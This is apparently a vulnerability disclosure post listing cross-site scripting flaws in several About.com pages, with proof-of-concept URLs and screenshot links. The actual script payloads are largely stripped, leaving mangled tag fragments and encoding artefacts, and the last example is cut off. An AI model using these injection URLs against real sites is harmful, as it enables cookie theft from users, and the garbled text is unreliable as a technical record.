About.com - XSS with cookie disclosure
About.com - XSS with cookie disclosure
About.com=0D
=0D
Homepage:=0D
http://www.about.com=0D
=0D
Effected files:=0D
Search input box=0D
fullsearch.htm=0D
shortform.htm=0D
forum.aspx=0D
profile_center.asp=0D
posting in the forum=0D
-----------------------------------=0D
=0D
Search input box xss vuln with cookie disclosure:=0D
Works by putting the =0D">http://search.about.com/fullsearch.htm?terms==0D
=0D
Screenshots:=0D
http://www.youfucktard.com/xsp/about1.jpg=0D
http://www.youfucktard.com/xsp/about2.jpg=0D
=0D
-----------------------------------------=0D
=0D
Shortform.htm XSS vuln no filter evasion needed:=0D
http://login.about.com/shortform.htm?Error==0D
=0D
Screenshots:=0D
http://www.youfucktard.com/xsp/about3.jpg=0D
=0D
---------------------------------------------=0D
=0D
Forum.aspx xss vuln. Here we have malformed image tags, as well as empty script tags:=0D
=0D
PoC:=0D
">1&tid=1456">">"><"">'>'>'><"">">"><"<"<"<"<""><"<"<'<'&webtag=ab-vgstrategies=0D">http://forums.about.com/n/pfx/forum.aspx?nav=messages&tsn=">1&tid=1456">">"><"">'>'>'><"">">"><"<"<"<"<""><"<"<'<'&webtag=ab-vgstrategies=0D
=0D
------------------------------------------------------=0D
=0D
Profile_center.asp xss vuln:=0D
=0D
">"><"<"<"&dMode=0&eBtn=0&uid=1574961808=0D">http://forums.about.com/dir-app/bbCard/profile_center.asp?webtag=ab-vgstrategies&cType=2&uName=jonne1234">">"><"<"<"&dMode=0&eBtn=0&uid=1574961808=0D
=0D
------------------------------------------------------=0D
=0D
Posting in the forum XSS vuln. This time we'll use the allowed tags . For PoC try posting this in the forum:=0D
=0D